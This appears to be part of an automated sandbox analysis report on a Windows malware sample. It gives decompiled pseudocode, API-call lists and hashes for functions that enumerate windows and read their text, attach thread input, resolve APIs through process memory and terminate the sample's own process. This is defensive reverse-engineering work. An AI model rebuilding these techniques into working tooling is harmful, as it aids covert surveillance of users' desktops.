                                          				if(_t16 != 0) {
                                          					L10:
                                          					return _t16;
                                          				} else {
                                          					_t16 = E00C6412C(_t28, __rax, _t38, _t52, _t53, _t53, _t55);
                                          					if(__rax != 0) {
                                          						_t16 = E00C64458(_t16 - _t25, __rax, _t38, _t52);
                                          						_t27 = _t16;
                                          						if(_t16 != 0) {
                                          							_t4 = _t38 + 1; // 0x1
                                          							r8d = _t4;
                                          							_v56 = _t38;
                                          							r9d = 0;
                                          							_v64 = 0x80;
                                          							_v72 = 3;
                                          							_t16 = CreateFileA(??, ??, ??, ??, ??, ??, ??);
                                          							if(__rax != 0xffffffff) {
                                          								r9d = 0;
                                          								r8d = 0;
                                          								if(SetFilePointer(??, ??, ??, ??) == _t27) {
                                          									_v72 = _t38;
                                          									_t10 = _t38 + 4; // 0x4
                                          									r8d = _t10;
                                          									if(ReadFile(??, ??, ??, ??, ??) != 0 && _a24 == 4) {
                                          										_t38 = _t38 + _t52;
                                          									}
                                          								}
                                          								_t16 = CloseHandle();
                                          							}
                                          						}
                                          					}
                                          					E00C61E84();
                                          					goto L10;
                                          				}
                                          			}

                                          APIs
                                            • Part of subcall function 00C64588: GetModuleFileNameA.KERNEL32(?,?,0000001B,00C6258A,?,?,?,00C61EDA,?,?,?,00C6203D), ref: 00C645C5
                                            • Part of subcall function 00C6412C: lstrcmpA.KERNEL32(?,00000001,00000000,00C62DED,?,?,?,?,00000001,00000000,?,00C62D71,?,?,00000000,00000000), ref: 00C6418B
                                          • CreateFileA.KERNEL32 ref: 00C64B82
                                          • SetFilePointer.KERNEL32 ref: 00C64B9C
                                          • ReadFile.KERNEL32 ref: 00C64BC2
                                          • CloseHandle.KERNEL32 ref: 00C64BE3
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseCreateHandleModuleNamePointerReadlstrcmp
                                          • String ID:
                                          • API String ID: 3110218675-0
                                          • Opcode ID: 9660b1a0b00316994f9b77e30b835ac6c3c7e12960be0111e568e41eb0c5f8c6
                                          • Instruction ID: 6db5b1c3f6e2b891d2c167cbafc54ec517a016799400c7c8687a8d5221b8adca
                                          • Opcode Fuzzy Hash: 9660b1a0b00316994f9b77e30b835ac6c3c7e12960be0111e568e41eb0c5f8c6
                                          • Instruction Fuzzy Hash: 5721A73630869183EB349B25F994B5A7255FBC5BD4F488221DE5947F58DF38C94ACB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: memcpymemsetselectsend
                                          • String ID:
                                          • API String ID: 3107527136-0
                                          • Opcode ID: 3b67da3546080e9a876a68d2e648cb2e100cbd4a52bf21289696156c7a2d422c
                                          • Instruction ID: d3da539f159321b8ce752a47684a30ace9c163fd3b326d3742c377837cb8df87
                                          • Opcode Fuzzy Hash: 3b67da3546080e9a876a68d2e648cb2e100cbd4a52bf21289696156c7a2d422c
                                          • Instruction Fuzzy Hash: B121A432310B4086D730DF6695C47A97755E788BE0F194225EF6A47B94CF39C5468740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			// Wait loop over two handles taken from the context at +8 and +0x10 (copied to the stack as the
                                          			// handle array). WaitForMultipleObjects result 0 (first handle signalled): run the E00C78C54
                                          			// cleanup (UnmapViewOfFile/CloseHandle, see APIs below) and return. Result 1 (second handle):
                                          			// clean up, then OpenProcess on GetCurrentProcessId and TerminateProcess, i.e. the sample
                                          			// terminates its own process. WAIT_TIMEOUT (0x102): call E00C7E7C0 and keep waiting.
                                          			E00C68C8C(signed int __ebx, signed int __ebp, long long __rbx, signed long long* __rcx, void* __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16) {
                                          				void* _v40;
                                          				long _t18;
                                          				void* _t28;
                                          				signed int _t36;
                                          				long long _t39;
                                          				long long _t41;
                                          				signed long long* _t50;
                                          				void* _t52;
                                          				void* _t55;
                                          				void* _t59;
                                          				void* _t60;
                                          
                                          				_t59 = __r9;
                                          				_t53 = __rbp;
                                          				_t52 = __rsi;
                                          				_t42 = __rbx;
                                          				_t60 = _t55;
                                          				 *((long long*)(_t60 + 8)) = __rbx;
                                          				 *((long long*)(_t60 + 0x10)) = __rbp;
                                          				_t50 = __rcx;
                                          				_t39 =  *0xc956a0; // 0x1b8
                                          				asm("sbb ebx, ebx");
                                          				 *((long long*)(_t60 - 0x28)) = _t39;
                                          				 *((long long*)(_t60 - 0x20)) =  *((intOrPtr*)(__rcx + 8));
                                          				_t36 = __ebp | 0xffffffff;
                                          				_t41 =  *((intOrPtr*)(__rcx + 0x10));
                                          				_t28 = (__ebx & 0x000003e9) + _t36;
                                          				 *((long long*)(_t60 - 0x18)) = _t41;
                                          				while(1) {
                                          					r8d = 0;
                                          					r9d = _t28;
                                          					_t18 = WaitForMultipleObjects(??, ??, ??, ??);
                                          					if(_t18 == 0) {
                                          						break;
                                          					}
                                          					if(_t18 == 1) {
                                          						E00C78C54(_t50);
                                          						r8d = GetCurrentProcessId();
                                          						OpenProcess(??, ??, ??);
                                          						if(_t41 != 0) {
                                          							TerminateProcess();
                                          						}
                                          						L6:
                                          						return 0;
                                          					} else {
                                          						if(_t18 == 0x102) {
                                          							_t41 =  *((intOrPtr*)(_t50 + 0x20));
                                          							E00C7E7C0( *((intOrPtr*)(_t41 + 0x15c)),  *((intOrPtr*)(_t41 + 0x158)), _t42, _t52, _t53, _t59);
                                          							_t28 =  !=  ? _t36 : _t28;
                                          						}
                                          						continue;
                                          					}
                                          				}
                                          				E00C78C54(_t50);
                                          				goto L6;
                                          			}

                                          APIs
                                          • WaitForMultipleObjects.KERNEL32 ref: 00C68D06
                                            • Part of subcall function 00C78C54: UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C66
                                            • Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78C7A
                                            • Part of subcall function 00C78C54: UnmapViewOfFile.KERNEL32(?,?,?,00C78B4B), ref: 00C78C8E
                                            • Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CA2
                                            • Part of subcall function 00C78C54: FindCloseChangeNotification.KERNELBASE(?,?,?,00C78B4B), ref: 00C78CB6
                                            • Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CC9
                                            • Part of subcall function 00C78C54: CloseHandle.KERNEL32(?,?,?,00C78B4B), ref: 00C78CDC
                                          • GetCurrentProcessId.KERNEL32 ref: 00C68D32
                                          • OpenProcess.KERNEL32 ref: 00C68D40
                                          • TerminateProcess.KERNEL32 ref: 00C68D50
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Close$Handle$Process$FileUnmapView$ChangeCurrentFindMultipleNotificationObjectsOpenTerminateWait
                                          • String ID:
                                          • API String ID: 1069760962-0
                                          • Opcode ID: 068d6b873d512494b86f9f9cae334f2dd87fc5d8b7665fcddc374f6f30138a66
                                          • Instruction ID: c0f2c006c5d16be7991f790b1944c3e4507870029632a4ed87690548e7998b21
                                          • Opcode Fuzzy Hash: 068d6b873d512494b86f9f9cae334f2dd87fc5d8b7665fcddc374f6f30138a66
                                          • Instruction Fuzzy Hash: 89114A32305B4486EB24DF2AE888B6973A1FB48B94F658635CA5D87760EF34C949C714
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpenThreadWindow
                                          • String ID:
                                          • API String ID: 1586161098-0
                                          • Opcode ID: cf1b3af0343802f2d6bfc0a4cdab683a591a9bcb506045d5d7b2e04c60943b8c
                                          • Instruction ID: 00b38b932e5e01779dbcf076e95774d9ff3659c3a5c7168acca30fd179aed8ef
                                          • Opcode Fuzzy Hash: cf1b3af0343802f2d6bfc0a4cdab683a591a9bcb506045d5d7b2e04c60943b8c
                                          • Instruction Fuzzy Hash: 6D118621301B0486EB25DF6BA444769B7A1A789FD0F49C0389F1D43B14EF78CD46C700
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 47%
                                          			// Recursive walk of a window tree. For each window in the chain starting at __rcx (advanced with the
                                          			// GetWindow call at the bottom of the loop) it filters via E00C7C050 (IsWindow/GetAncestor, see APIs
                                          			// below), clears a 0x60-byte record, fills it through E00C7CA1C (GetWindowInfo/GetWindowTextA/ShowWindow)
                                          			// and E00C7CFB4 (GetWindowRect/GetWindowLongPtrA), and then calls itself on the window returned by
                                          			// GetWindow so that child windows are covered as well.
                                          			E00C7CECC(void* __ecx, void* __eflags, long long __rax, long long __rbx, long long __rcx, long long __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                          				void* _v8;
                                          				long long _v40;
                                          				char _v104;
                                          				long long _v120;
                                          				void* __rdi;
                                          				void* _t19;
                                          				struct HWND__* _t20;
                                          				void* _t22;
                                          				void* _t27;
                                          				long long _t36;
                                          				long long _t38;
                                          				long long _t50;
                                          				intOrPtr _t54;
                                          				long long _t56;
                                          
                                          				_t58 = __rbp;
                                          				_t36 = __rax;
                                          				_t27 = __ecx;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t54 =  *((intOrPtr*)(__rdx + 0x40));
                                          				_t56 = __rdx;
                                          				_t38 = __rcx;
                                          				do {
                                          					_t50 = _t38;
                                          					_t19 = E00C7C050(_t36, _t38, _t54 + 0x88, _t50, _t56);
                                          					_t33 = _t19;
                                          					if(_t19 != 0) {
                                          						_t7 = _t50 + 0x60; // 0x60
                                          						r8d = _t7;
                                          						memset(??, ??, ??);
                                          						_v120 = _t56;
                                          						_t22 = E00C7CA1C(_t27, 0, _t33, _t38, _t54, _t38, _t54, _t56,  *((intOrPtr*)(_t54 + 0x720)),  *((intOrPtr*)(_t54 + 0x728)));
                                          						_t34 = _t22;
                                          						if(_t22 != 0) {
                                          							E00C7CFB4(_t36, _t38, _t38,  &_v104, _t56, _t56);
                                          							asm("movups xmm0, [esi+0x48]");
                                          							_t36 =  *((intOrPtr*)(_t56 + 0x40));
                                          							_v40 = _t36;
                                          							asm("movdqu [esp+0x78], xmm0");
                                          							GetWindow(??, ??);
                                          							GetWindow(??, ??);
                                          							E00C7CECC(_t27, _t34, _t36, _t38, _t36,  &_v104, _t56, _t58);
                                          						}
                                          					}
                                          					_t20 = GetWindow();
                                          					_t38 = _t36;
                                          				} while (_t36 != 0);
                                          				return _t20;
                                          			}

                                          APIs
                                            • Part of subcall function 00C7C050: IsWindow.USER32 ref: 00C7C06A
                                            • Part of subcall function 00C7C050: GetAncestor.USER32(?,?,?,00C7C19D), ref: 00C7C093
                                          • memset.NTDLL ref: 00C7CF0B
                                            • Part of subcall function 00C7CA1C: GetWindowInfo.USER32 ref: 00C7CA80
                                            • Part of subcall function 00C7CA1C: GetWindowTextA.USER32 ref: 00C7CAAC
                                            • Part of subcall function 00C7CA1C: ShowWindow.USER32 ref: 00C7CABB
                                            • Part of subcall function 00C7CFB4: GetWindowRect.USER32 ref: 00C7CFCC
                                            • Part of subcall function 00C7CFB4: GetWindowLongPtrA.USER32 ref: 00C7CFFD
                                            • Part of subcall function 00C7CFB4: GetScrollBarInfo.USER32 ref: 00C7D020
                                            • Part of subcall function 00C7CFB4: memcpy.NTDLL ref: 00C7D040
                                            • Part of subcall function 00C7CFB4: GetScrollBarInfo.USER32 ref: 00C7D052
                                            • Part of subcall function 00C7CFB4: memcpy.NTDLL ref: 00C7D072
                                          • GetWindow.USER32 ref: 00C7CF5D
                                          • GetWindow.USER32 ref: 00C7CF6B
                                          • GetWindow.USER32 ref: 00C7CF86
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Info$Scrollmemcpy$AncestorLongRectShowTextmemset
                                          • String ID:
                                          • API String ID: 4134195742-0
                                          • Opcode ID: a8fafee3003e1ec9de8990617f7f79df9fa66096aba69bb4669c604bdbc2154a
                                          • Instruction ID: 8895a571fd462112c094258f51253c4e792f98bfc0e681a160fdfd228e1178da
                                          • Opcode Fuzzy Hash: a8fafee3003e1ec9de8990617f7f79df9fa66096aba69bb4669c604bdbc2154a
                                          • Instruction Fuzzy Hash: E011AF22704B8186EB14DB22E94079AB3A1F788BC0F589136EF9D43B19EF3CC955CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E00C64C04(void* __ecx, void* __edi, long long __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                          				void* _t19;
                                          				void* _t24;
                                          				long long _t27;
                                          				long long _t40;
                                          				long long _t42;
                                          				intOrPtr* _t50;
                                          
                                          				_t28 = __rbx;
                                          				_t27 = __rax;
                                          				_a8 = __rbx;
                                          				_a16 = __rbp;
                                          				_a24 = __rsi;
                                          				_t24 = r8d;
                                          				_t50 = __rcx;
                                          				_t19 = 8;
                                          				_t25 = r8b & 0x00000010;
                                          				if((r8b & 0x00000010) == 0) {
                                          					E00C644C0();
                                          					_t42 = _t27;
                                          					L4:
                                          					E00C61E70();
                                          					_t40 = _t27;
                                          					__eflags = _t27;
                                          					if(_t27 != 0) {
                                          						__eflags = 0;
                                          						r8d = 0x318;
                                          						memset(??, ??, ??);
                                          						_t7 = _t40 + 0x18; // 0x18
                                          						 *((long long*)(_t40 + 8)) = _t42;
                                          						 *((long long*)(_t40 + 0x10)) = _t7;
                                          						lstrcpyA(??, ??);
                                          						r8d = _t24;
                                          						_t19 = E00C64CC8(_t27, _t28, _t50, _t40);
                                          						E00C61E84();
                                          					}
                                          					L6:
                                          					return _t19;
                                          				}
                                          				E00C64750(__ecx, _t24, _t25, __rbx,  *__rcx, "KERNEL32.DLL", __rsi, "LoadLibraryA");
                                          				_t42 = _t27;
                                          				if(_t27 != 0) {
                                          					goto L4;
                                          				}
                                          				_t6 = _t27 + 2; // 0x2
                                          				_t19 = _t6;
                                          				goto L6;
                                          			}

                                          APIs
                                          • memset.NTDLL(00000000,00000000,00001644,00C61769), ref: 00C64C78
                                          • lstrcpyA.KERNEL32(00000000,00000000,00001644,00C61769), ref: 00C64C8C
                                            • Part of subcall function 00C64750: VirtualAlloc.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C647A2
                                            • Part of subcall function 00C64750: ReadProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C647DD
                                            • Part of subcall function 00C64750: VirtualFree.KERNEL32(?,?,?,?,00000000,?,?,00000000,00001644,00C64C46,00000000,00000000,00001644,00C61769), ref: 00C6482E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFreeMemoryProcessReadlstrcpymemset
                                          • String ID: KERNEL32.DLL$LoadLibraryA
                                          • API String ID: 1877694828-1423781741
                                          • Opcode ID: 30229c1808a3c957cb11789524a799e5e44d2513da27a52ca03e06e737d0fd1f
                                          • Instruction ID: c1aeaa2ecbfbba484cc9a8745f1507f295c58d04ff87ab61b013009897c82b67
                                          • Opcode Fuzzy Hash: 30229c1808a3c957cb11789524a799e5e44d2513da27a52ca03e06e737d0fd1f
                                          • Instruction Fuzzy Hash: CB11C222301B5192EA28DB57E88431A7760FB89BC0F888425EE5C47B59EF39C9958344
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveLongWindow
                                          • String ID:
                                          • API String ID: 3319364134-0
                                          • Opcode ID: 06ba38139b972e601d3960d9e72826b1e112c79212c74b02d0b30622424208b2
                                          • Instruction ID: 0b315783060a83e8bc2723fd915a1fbedb372d988a5ddba15f1382d4229d42b0
                                          • Opcode Fuzzy Hash: 06ba38139b972e601d3960d9e72826b1e112c79212c74b02d0b30622424208b2
                                          • Instruction Fuzzy Hash: 3E117972205F40C2EB20CF26E88475973A8F788F94F998621EE5E43768DF39C995C340
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 20%
                                          			E00C80324(long long __rbx, signed int __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
                                          				signed long long _v24;
                                          				intOrPtr _v32;
                                          				intOrPtr _v40;
                                          				long _t20;
                                          				long _t22;
                                          				void* _t27;
                                          				void* _t30;
                                          				void* _t41;
                                          				void* _t46;
                                          				void* _t48;
                                          				void* _t53;
                                          				void* _t54;
                                          				WCHAR* _t55;
                                          				void* _t56;
                                          
                                          				_t53 = __r9;
                                          				_t43 = __rsi;
                                          				_t30 = _t48;
                                          				 *((long long*)(_t30 + 8)) = __rbx;
                                          				 *((long long*)(_t30 + 0x10)) = __rbp;
                                          				 *((long long*)(_t30 + 0x18)) = __rsi;
                                          				 *((long long*)(_t30 + 0x20)) = __rdi;
                                          				 *(_t30 - 0x18) =  *(_t30 - 0x18) & 0x00000000;
                                          				_t27 = r9d;
                                          				r9d = 0;
                                          				 *((intOrPtr*)(_t30 - 0x20)) = 0x2000080;
                                          				_t46 = __r8;
                                          				 *((intOrPtr*)(_t30 - 0x28)) = 3;
                                          				_t56 = __rdx;
                                          				_t32 = __rcx;
                                          				_t9 = _t53 + 7; // 0x7
                                          				r8d = _t9;
                                          				CreateFileW(_t55, ??, ??, ??, ??, ??);
                                          				_t41 = _t30;
                                          				if(_t30 != 0xffffffff) {
                                          					L3:
                                          					r9d = _t27;
                                          					_t20 = E00C801BC(_t32, _t41, _t56, _t41, _t43, _t46, _t54);
                                          					CloseHandle(??);
                                          					_t22 = _t20;
                                          				} else {
                                          					_v24 = _v24 & 0x00000000;
                                          					_t12 = _t30 + 8; // 0x8
                                          					r8d = _t12;
                                          					_v32 = 0x80;
                                          					r9d = 0;
                                          					_v40 = 3;
                                          					CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                          					_t41 = _t30;
                                          					if(_t30 != 0xffffffff) {
                                          						goto L3;
                                          					} else {
                                          						_t22 = GetLastError();
                                          					}
                                          				}
                                          				return _t22;
                                          			}

                                          APIs
                                          • CreateFileW.KERNEL32 ref: 00C80368
                                          • CreateFileW.KERNEL32(?,?,?,?,?,?,?,00C8015C), ref: 00C8039C
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,00C8015C), ref: 00C803AB
                                          • CloseHandle.KERNEL32 ref: 00C803C9
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile$CloseErrorHandleLast
                                          • String ID:
                                          • API String ID: 77722140-0
                                          • Opcode ID: d995f217c23a6de9f541f33c817ba5fb3a8da49f2974aa7b36971760cb2ed917
                                          • Instruction ID: 4d470787cbb37919d4ba644db32f81807b49c6a6ddc086b86bc92d723c1bf8ea
                                          • Opcode Fuzzy Hash: d995f217c23a6de9f541f33c817ba5fb3a8da49f2974aa7b36971760cb2ed917
                                          • Instruction Fuzzy Hash: 6311793270075086E7109B12BA587197A60F388FF8F548311DFA507BE4CF78C9498748
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Rect$Parent
                                          • String ID:
                                          • API String ID: 1036685349-0
                                          • Opcode ID: 32ec5ae3594d325a516dad10a414788f8aaecf9f3cbd10f83967aa533d646471
                                          • Instruction ID: cc263e7566a7bd1385cf05107213b17292a70d419412ed3853782bdab94e41dd
                                          • Opcode Fuzzy Hash: 32ec5ae3594d325a516dad10a414788f8aaecf9f3cbd10f83967aa533d646471
                                          • Instruction Fuzzy Hash: C4115A323245428BD714CF7DF945B0ABBA1F789B94F589224BB8483E98CE7CD0088F04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualProtect.KERNEL32(?,?,00000000,00C68648,?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C6847D
                                          • VirtualProtect.KERNEL32(?,?,00000000,00C68648,?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C68498
                                          • VirtualProtect.KERNEL32(?,?,00000000,00C68648,?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C684BD
                                          • VirtualProtect.KERNEL32(?,?,00000000,00C68648,?,?,?,00C61F88,?,?,?,00C6203D), ref: 00C684DB
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 3b3950b7e6807380c8a1aa00eb2f1c1b284069b620585972cc9102cffa1d9835
                                          • Instruction ID: 0ca7986cbc911ef5cbefd215adc0794a05d29a77f9176d1e95724fbb5a34192e
                                          • Opcode Fuzzy Hash: 3b3950b7e6807380c8a1aa00eb2f1c1b284069b620585972cc9102cffa1d9835
                                          • Instruction Fuzzy Hash: 4E111F36324A4197D764CF26E444B9D7321F788F84F589122EF5A07B68CF39D55ACB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • EnterCriticalSection.KERNEL32(?,?,?,00C61FF3), ref: 00C6A350
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00C61FF3), ref: 00C6A38F
                                          • UnhookWindowsHookEx.USER32 ref: 00C6A3A3
                                          • HeapFree.KERNEL32(?,?,?,00C61FF3), ref: 00C6A3B5
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapHookLeaveUnhookWindows
                                          • String ID:
                                          • API String ID: 3224164451-0
                                          • Opcode ID: 7aaec8ab5d6258962b13d95244b3537d00b036593ed8ef02579c229995e19602
                                          • Instruction ID: 5a2d15dbaaa8c2f41ed2c127e6d1e3ab2e19cf0c546f185c2453eb253af6c3b1
                                          • Opcode Fuzzy Hash: 7aaec8ab5d6258962b13d95244b3537d00b036593ed8ef02579c229995e19602
                                          • Instruction Fuzzy Hash: D9113532604B40C2EB25CF52E8C472D73A1F794F90F989622DA5A53734CF38CA85CB45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00C7B6D9
                                          • GetWindowThreadProcessId.USER32 ref: 00C7B6EE
                                          • AttachThreadInput.USER32 ref: 00C7B719
                                          • AttachThreadInput.USER32 ref: 00C7B737
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Thread$AttachInput$CurrentProcessWindow
                                          • String ID:
                                          • API String ID: 3335540525-0
                                          • Opcode ID: fe3b286768abf8f39a3f24d4c00ce798516d5af6e46ec10c843bcb2ce74cabd9
                                          • Instruction ID: 6c61dab9e3d60371689e16f23b0a064d34817f9bffde180751666edb6606fe63
                                          • Opcode Fuzzy Hash: fe3b286768abf8f39a3f24d4c00ce798516d5af6e46ec10c843bcb2ce74cabd9
                                          • Instruction Fuzzy Hash: D011613671068087E7188B21E588769B371F784B81F64C128DB2947B48DF39DD64CF10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$PrintRedrawSleep
                                          • String ID:
                                          • API String ID: 1013652024-0
                                          • Opcode ID: f48becbb382c6ec564d7d7cd3857b9db3436958c281b933e297a415aed1c67c2
                                          • Instruction ID: 0b5f61c6b7ce10f85ff42fd8efb7a8870c4d0ba5420711417b44e84061550a66
                                          • Opcode Fuzzy Hash: f48becbb382c6ec564d7d7cd3857b9db3436958c281b933e297a415aed1c67c2
                                          • Instruction Fuzzy Hash: 52016221314BA082F7249F1BA880B1E7774FB88FC0F958025EF5A83B24CE39C5568709
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
